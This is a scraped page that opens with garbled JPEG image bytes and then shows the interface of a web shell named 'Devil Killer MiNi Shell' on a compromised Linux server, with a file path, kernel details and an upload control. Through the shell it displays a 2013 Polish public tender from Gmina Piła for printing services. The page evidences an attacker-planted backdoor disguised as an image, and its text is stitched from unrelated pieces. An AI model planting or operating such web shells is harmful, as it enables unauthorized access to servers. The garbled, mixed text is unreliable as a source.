JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/14143-N-2013.html

<p class="kh_header"><b>Piła: Sukcesywne projektowanie, druk i dostawa plakatów,  ulotek,  zaproszeń, dyplomów, roll-upów, wizytówek  i  innych</b><br>
<b>Numer ogłoszenia: 14143 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne projektowanie, druk i dostawa plakatów,  ulotek,  zaproszeń, dyplomów, roll-upów, wizytówek  i  innych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> GRUPA 1 (termin realizacji 2 dni robocze od akceptacji projektu i wzoru)

1. Wizytówki - próbka
Format: 	90x50 mm
Druk: 		jednostronny kolor 4+0
Papier: 		kreda mat 350 gram lub satyna 350 g/m kw, białość: min 168 CIE
Pakowanie: 	po 100 sztuk w kartoniku z logo UM PIŁA (technika znakowania kartonika dowolna)
Nakład: 	200 sztuk x 50 wzorów - zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	zgodny z księgą znaków, zmiana danych teleadresowych

2. Zaproszenia Biura Prezydenta - próbka
Format: 	? A4 (297x105 mm) łamane do A6 (148,4x105 mm)
Druk: 		dwustronny kolor 4+4
Papier: 		300 g/m kw, satyna, ivory / kość słoniowa
Nakład: 	100 szt. x 7 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	zgodny z księgą znaków, zmiana danych teleadresowych

3. Zaproszenia ekskluzywne
Format: 	DL (99x210 mm) 
Druk: 		dwustronny kolor 4+4
Zaproszenia z nadrukiem indywidualnym (personalizowane dane kontaktowe)
Papier: 		290 g/m kw, Sirlio Pearl
Tłoczenie: 	(suchy stempel) - 1 miejsce
Koperta:	110x220 mm, papier 110 gram Sirlio Pearl
Nakład: 	500 szt. x 1 edycja  
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

4. Dyplomy
Format: 	A4 (210x297 mm)
Druk: 		jednostronny kolor 4+0
Papier: 		300 g/m kw, satyna, biały, białość: min 168 CIE
Tłoczenie: 	(suchy stempel) - 1 miejsce
Nakład:		200 szt. - 1 edycji 
1 szt. x 30 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

5. Koziołki na stół
Format:	 	A4 (210x297 mm), składany do ? A4 (105x297 mm)
Druk: 		4+0
Papier:	 	300 g/m kw, satyna, ivory / kość słoniowa
Nakład:  	1 szt. x 50 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

6. Naklejki  (próbka)
Format: 	3x3 cm - nieregularne kształty
Druk: 		jednostronny kolor 4+0
Folia: 		monomeryczna biała mat lub błysk, grubość: minimum 100 mic
Nakład: 	100 szt. x 30 edycji zamawianych sukcesywnie według zapotrzebowania (różne 
wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

7. Billboardy wraz z wyklejeniem na tablicach wjazdowych (próbka wydruku - minimum 40x40 cm)
Format: 	504x230 cm
Druk: 		jednostronny kolor, 4+0
Papier: 		blueback 130 g/m
Montaż: 	na tablicach billboardowych umieszczonych na terenie miasta Piły
Nakład: 	30 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

8. Banery (próbka wydruku - minimum 40x40 cm)
Druk:		 jednostronny kolor, 4+0
Medium: 	frontlit 510 g/m
Oczkowanie: 	standard (co 50 cm), oczka metalowe
Nakład: 	łącznie 200 m kw (różne wielkości banerów, różne wzory zamawiane sukcesywnie 
według zapotrzebowania)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

9. Tabliczki okolicznościowe w etui A5 - próbka gotowego podkładu i etui
Podkład: 	drewniany lub drewnopodobny mahoń lub wiśnia - wymiar: 203x254 mm
Metoda znakowania:  grawerowanie lub frezowanie, na laminacie grawerskim - kolor złoty, litery 
czarne -wymiar tabliczki: 175 x 220 mm
Etui:	okładka twarda oklejona Owilem introligatorskim, wnętrze wypełnione materiałem welurowym w kolorze oprawy z miejscem na podkład drewniany 
Nakład: 	1 szt. x 20 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

10. Tabliczki okolicznościowe w etui A4 
Podkład: 	drewniany lub drewnopodobny mahoń lub wiśnia - wymiar: 304x381 mm
Metoda znakowania:  grawerowanie lub frezowanie, na laminacie grawerskim - kolor złoty, litery 
czarne -wymiar tabliczki: 210x297 mm
Etui:	okładka twarda oklejona Owilem introligatorskim, wnętrze wypełnione materiałem welurowym w kolorze oprawy z miejscem na podkład drewniany
Nakład: 	1 szt. x 50 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

11. Naklejka na Taxi (próbka wydruku - minimum 20x40 cm)
Format: 	25x45 cm - nieregularne kształty
Druk: 		pełen kolor 4+0
Folia: 	na foli monomerycznej mat lub błysk, minimum 100 mic + laminat monomeryczny z filtrem UV
Nakład: 	100 szt. x 3 edycje zamawiane sukcesywnie według zapotrzebowania (jeden wzór)
Projekt:	zgodny z załącznikiem nr 11 do SIWZ

12. Czeki (próbka wydruku - minimum 40x40 cm)
Format: 	A2 (420x594 mm)
Nośnik:		PCV spienione 2 mm, białe
Druk: 		na foli monomerycznej mat lub błysk, minimum 100 mic lub bezpośrednio 
na nośniku, pełen kolor 4+0
Nakład: 	1 szt. x 30  edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

13. Plakat informacyjny
Format:	1072x1160 mm
Nośnik: 	papier White Back, minimum 170 g/m kw
Druk:	offsetowy lub cyfrowy, jednostronnie pełen kolor (4+0)
Nakład:	1 szt. x 24 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

14. Naklejka Dyktando (próbka wydruku - minimum 15x25 cm)
Format: 	15x25 cm - nieregularne kształty
Druk: 		pełen kolor 4+0
Folia: 	na foli monomerycznej mat lub błysk, minimum 100 mic 
Nakład:	500 szt. x 1 (jeden wzór)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

GRUPA 2 (termin realizacji 4 dni robocze od akceptacji projektu i wzoru)

1. Plakaty - próbka
Format: 	A2 (420x594 mm)
Druk: 		jednostronny kolor 4+0 + lakier dyspersyjny
Papier: 		kreda powlekana biała błysk lub mat 130-135 g/m kw
Nakład: 	100 szt. - 3 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

2. Plakaty - próbka
Format: 	A1 (594x841 mm)
Druk: 		jednostronny kolor 4+0 + lakier dyspersyjny
Papier: 		kreda powlekana biała błysk lub mat 130-135 g/m kw
Nakład: 	100 szt. - 5 edycji zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

3. Ulotka - próbka
Format:		A5 (148,5x210 mm)
Druk: 		dwustronny kolor 4+4 + lakier dyspersyjny
Kreda: 		kreda powlekana biała błysk lub mat 170 g/m kw
Nakład:		500 szt. - 2 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

4. Ulotka 
Format:		 A3 składany do A4
Druk:		dwustronny kolor 4+4
Papier:		300 g/m kw, mat
Nakład: 	500 szt. - 2 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

5. Roll up (próbka wydruku - minimum 40 x 40 cm)
Kaseta:		aluminiowa z 2 nóżkami + pokrowiec
Format powierzchni zadruku: 85x200 cm
Druk:		wysokiej jakości, rozdzielczość druku minimum 1440 dpi, druk pigmentowy
Nośnik:		poliprop outdoor - baner 200 mic
Druk: 		jednostronny kolor, 4+0
Nakład: 	10 sztuk zamawianych sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

6. Pocztówka  (próbka)
Format:		A6 (105x148,5 mm)
Druk:		dwustronny pełen kolor - 4+4
Papier:		karton 300 gram + laminacja jednostronna błysk
Nakład:		1.000 sztuk - 1 edycja (jeden wzór)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

7. Przygotowanie wydruków do stoiska targowego
Opracowanie graficzne i wykonanie elementów montażowych do stoiska targowego.
a) Specyfikacja ścianek:
Format:		200x100 cm - 4 sztuki
Nośnik: 	folia Blockout 260 mic z nadrukiem bezpośrednim  + pasek magnetyczny o szerokości min 11 mm przyklejony po obrysie wydruku
Druk: 		bezpośrednio na nośniku, pełen kolor 4+0
b) Specyfikacja trybunki: 
Format:		97 x 136 cm
Nośnik: 	podkład każdorazowo dostarczany do zamawiającego w celu wyklejenia nowym wzorem
Druk:		na foli monomerycznej mat lub błysk, minimum 100 mic lub bezpośrednio 
na nośniku, pełen kolor 4+0
c) Specyfikacja regału
Format:		395 x 515 mm - 4 sztuki
Nośnik: 	podkład każdorazowo dostarczany do zamawiającego w celu wyklejenia nowym wzorem
Druk:		na foli monomerycznej mat lub błysk, minimum 100 mic lub bezpośrednio 
na nośniku, pełen kolor 4+0
Projekty:	indywidualne - koszt wykonania projektów należy wkalkulować w koszt wykonania usługi
Ilość edycji (przygotowania całych kompletów):		1 edycja

GRUPA 3 (termin realizacji 6 dni roboczych od akceptacji projektu i wzoru)

1. Papier firmowy - urzędowy - próbka
Format: 	A4 (210x297 mm)
Druk: 		jednostronny kolor 4+0
Papier: 		preprint 90 g/m kw, 166 CIE
Pakowanie:	w ryzach po 500 lub 1000 arkuszy
Nakład: 	10.000 szt. - 1 edycja (jeden wzór)
Projekt:	zgodny z księgą znaków

2. Teczki ofertowa Miasto Piła - próbka
Wymiary przed złożeniem: 	w zakresie szerokość 485 - 495 mm, wysokość 335 - 340 mm)
Wymiary po złożeniu: 		w zakresie szerokość 215 - 220 mm, wysokość 300 - 305 mm
1 bigowa
Papier: 		kreda mat 350 g / m kw
Druk: 		pełen kolor 4+0 + lakier dyspersyjny + lakier wybiórczy UV
Nakład: 	1.000 szt. - 1 edycja (jeden wzór)
Projekt:	zgodny z księgą znaków

3. Mapka - bloczek klejony 
Blok:		klejony po boku 420 mm, złożony z 25 kartek + podkład kartonowy
Format: 	A3 (297x420 mm)
Papier:		offset 80 gram
Druk:		jednostronny pełen kolor 4+0
Wykończenie:	podkład - karton min 150 gram
		Klejenie po krótszym boku
Nakład:	100 bloczków po 25 arkuszy każdy x 10 edycji zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

4. Siatka mesh (próbka wydruku - minimum 40x40 cm)
Druk:		jednostronny kolor, 4+0
Medium:	siatka mesh 270 g/m
Oczkowanie: 	standard (co 50 cm), oczka metalowe
Nakład:		łącznie 1500 m kw (różne wielkości w granicach 250-400 m kw 1 sztuka, różne wzory zamawiane sukcesywnie według zapotrzebowania)
Wymaganie techniczne: rękaw z każdej strony (góra, dół, prawa i lewa strona) siatki, szerokość zgrzewu z każdej strony (góra, dół, prawa i lewa strona)  siatki min 35 mm, przy siatkach szerszych niż 12 metrów dodatkowy rękaw przez środek siatki (w pionie), dodatkowe wzmocnienia rogów
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

5. Zaproszenia ekskluzywne
Format:		2xA5 (420x148,5 mm) złożona do A5 (210x148,5 mm) 
Druk: 		dwustronny kolor 4+4
		Zaproszenia z nadrukiem indywidualnym (personalizowane dane kontaktowe)
Papier: 		290 g/m kw, Sirlio Pearl
Koperta:	160x230 mm, papier 110 gram Sirlio Pearl
Nakład: 	600 szt. x 1 edycja  
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

GRUPA 4 (termin realizacji 11 dni roboczych od akceptacji projektu i wzoru)

1. Ulotki (próbka)
Format: 	A2 (420x594 mm) składne do formatu A3 (297x420 mm) 
Druk: 		dwustronny kolor 4+4
Papier: 		kreda mat biała błysk lub mat 170 g/m kw
Kolportaż: 	na terenie miasta Piły (adresy domowe)
Nakład: 	28.000 szt. x 2 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

2. Flagi (próbka minimum 40 x 40 cm)
Format: 	B2 (500x700 mm), obszyta wokół
Druk: 		pełen kolor 4+0
Materiał: 	polyglans
Nakład: 	30 sztuk - 1 edycja (jeden wzór)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi

3. Druk folderu
Folder zawiera łącznie 24 strony (okładka + 20 stron)
Format: 	A4 (210x297 mm)
Druk:		okładka:	dwustronny pełen kolor 4+4 + folia mat i lakier UV jednostronnie UV 
		środek:		dwustronny pełen kolor 4+4
Papier: 		okładka:	kreda mat 300 gram
		środek:		kreda mat 170 gram
Oprawa:	szyta
Wykończenie:	każdy egzemplarz opakowany w folię
Nakład: 	150 sztuk x 3 edycje zamawiane sukcesywnie według zapotrzebowania (różne wzory)
Projekt:	indywidualny - koszt wykonania projektu należy wkalkulować w koszt wykonania usługi


4. Druk akcydensowy - Zwrotne potwierdzenie odbioru pisma
Format: 	A6 (105x148,5 mm)
Papier:		offset 130-135 gram, biały
Druk:		dwustronny 1+1
Wykończenie: 	perforacja po krótszych bokach na szerokość 10 mm
Paski klejowe (taśma dwustronna) umieszczone z jednej strony kartki, na częściach perforowanych (po obu krótszych bokach), zabezpieczone zakładką, o szerokości 
min 3 mm
Nakład:		25.000 szt. - 1 edycja (jeden wzór)
Projekt:		zgodny z załącznikiem nr 7 do SIWZ

5. Druk akcydensowy - Zwrotne potwierdzenie odbioru pisma
Format: 	A6 (105x148,5 mm)
Papier:		offset 130-135 gram, biały
Druk:		dwustronny 1+1
Wykończenie: 	perforacja po krótszych bokach na szerokość 10 mm
Paski klejowe (taśma dwustronna) umieszczone z jednej strony kartki, na częściach perforowanych (po obu krótszych bokach), zabezpieczone zakładką, o szerokości 
min 3 mm
Nakład:		5.000 szt. - 1 edycja (jeden wzór)
Projekt:		zgodny z załącznikiem nr 8 do SIWZ

6. Druk akcydensowy - Zwrotne potwierdzenie odbioru pisma
Format: 	A6 (105x148,5 mm)
Papier:		offset 130-135 gram, biały
Druk:		dwustronny 1+1
Wykończenie: 	perforacja po krótszych bokach na szerokość 10 mm
Paski klejowe (taśma dwustronna) umieszczone z jednej strony kartki, na częściach perforowanych (po obu krótszych bokach), zabezpieczone zakładką, o szerokości 
min 3 mm
Nakład:		36.000 szt. - 1 edycja (jeden wzór)
Projekt:		zgodny z załącznikiem nr 9 do SIWZ

7. Bloczek samokopiujący - Dowód wpłaty opłaty targowej
Bloczek samokopiujący 90 kartkowy (oryginał + 2 kopie)
Format: 	A6 (105x148,5 mm)
Papier:		samokopiujący - oryginał biały + 2x kopia w różnych kolorach
Druk:		jednostronny 1+0
Wykończenie: 	bloczek klejony po krótszym (105 mm), lewym boku 
Komplety kolejno numerowane (numeracja sześciocyfrowa)
Podkład: karton na spód po całości
Nakład:		2.000 bloczków (60.000 kompletów) - 1 edycja (jeden wzór graficzny + numeracja)
Projekt:	zgodny z załącznikiem nr 10 do SIWZ

8. Torby papierowe A4 (przykładowe realizacje)
Format: 	w zakresie: szerokość 230-240 mm, wysokość 330-340 mm, głębokość 90-100 mm
Papier: 		dwustronnie kredowany biały, 170 gram
Druk: 		jednostronny 4+0 offsetowy  + laminat matowy + lakier wybiórczy UV
Zakładka: 	górna min 35 mm
Dno torby: 	usztywnione tekturą min 400 g / m kw
Uchwyt: 	sznurek biały, długość w zakresie 45-50 cm
Nakład:		1.000 sztuk - 1 edycja (jeden wzór)

9. Torby papierowe A3 (przykładowe realizacje)
Format: 	w zakresie: szerokość 320-330 mm, wysokość 390-400 mm, głębokość 90-100 mm
Papier: 		dwustronnie kredowany biały, 170 gram
Druk: 		jednostronny 4+0 offsetowy  + laminat matowy + lakier wybiórczy UV
Zakładka: 	górna min 35 mm
Dno torby: 	usztywnione tekturą min 400 g / m kw
Uchwyt: 	sznurek biały, długość w zakresie 45-50 cm
Nakład:		2.500 sztuk - 1 edycja (jeden wzór)


10. Pins 3D (przykładowe realizacje)
Format: 	okrągłe o średnicy 20 mm (+/- 1mm)
Nośnik: 	pins z mosiądzu z nadrukiem pełen kolor + powłoka epoksydowa wypukła
Mocowanie:	mocowanie na magnes 
Nakład:		3.000 sztuk - 1 edycja (jeden wzór)

Grupa 5

1. Usługa graficzna
na wykonanie projektów reklam prasowych, banerów na stronę www, w tym w wersji flesh, opracowanie prezentacji multimedialnych.
Łącznie: 350 roboczogodzin
Projekty wykonane będą na podstawie materiałów dostarczonych przez Zamawiającego, który posiada do nich autorskie prawa majątkowe.

WYMAGANIA ZAMAWIAJĄCEGO:

PRÓBKI MATERIAŁÓW:
1) Wykonawca dołączy do oferty próbki materiałów wskazane w specyfikacji, których koszty wykonania leżą po stronie Wykonawcy.
2) Próbka to materiały wykonane na materiałach i w technologii jakie będą wykorzystane w produkcji elementów przedmiotu zamówienia.

ZAMÓWIENIA:
1) Zamówienia będą składane sukcesywnie według potrzeb Zamawiającego.
2) Wykonawca jest zobligowany do przestrzegania zapisów z księgi znaku Zamawiającego, która jest załącznikiem do SIWZ.
3) Przypisane wielkości są planowanymi.
4) Zamówienia muszą być realizowane na materiałach przekazanych na próbkach.
5) Koszt i dostawa zamawianych materiałów będzie ponoszony przez Wykonawcę
6) Koszt i dostawa wydruków próbnych realizowanych zleceń będzie ponosił Wykonawca.

CZAS REAKCJI WYKONAWCY:
1) Odpowiedź za wysłane zamówienie - 2 roboczogodziny.
2) Projekt graficzny - 8 roboczogodzin od otrzymania materiałów.
3) Dostarczenie wydruków próbnych (grupa 1 oraz grupa 3) - 8 roboczogodzin od akceptacji projektu.

REALIZACJA WRAZ Z DOSTAWĄ DO ZAMAWIAJĄCEGO:
1) Grupa I - 2 dni robocze od akceptacji projektu i wzoru. 
2) Grupa II - 4 dni robocze od akceptacji projektu i wzoru. 
3) Grupa III - 6 dni roboczych od akceptacji projektu i wzoru. 
4) Grupa IV - 11 dni roboczych od akceptacji projektu i wzoru. 

PRAWA AUTORSKIE:
Wykonawca przenosi autorskie prawa majątkowe do wykonanych projektów w ramach umowy nieodpłatnie na Gminę Piła w momencie odbioru projektów przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.82.00.00-8, 79.82.30.00-9, 31.52.32.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, (w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4) SIWZ. 
2) Formularz cenowy - załącznik nr 2 do SIWZ.</p>
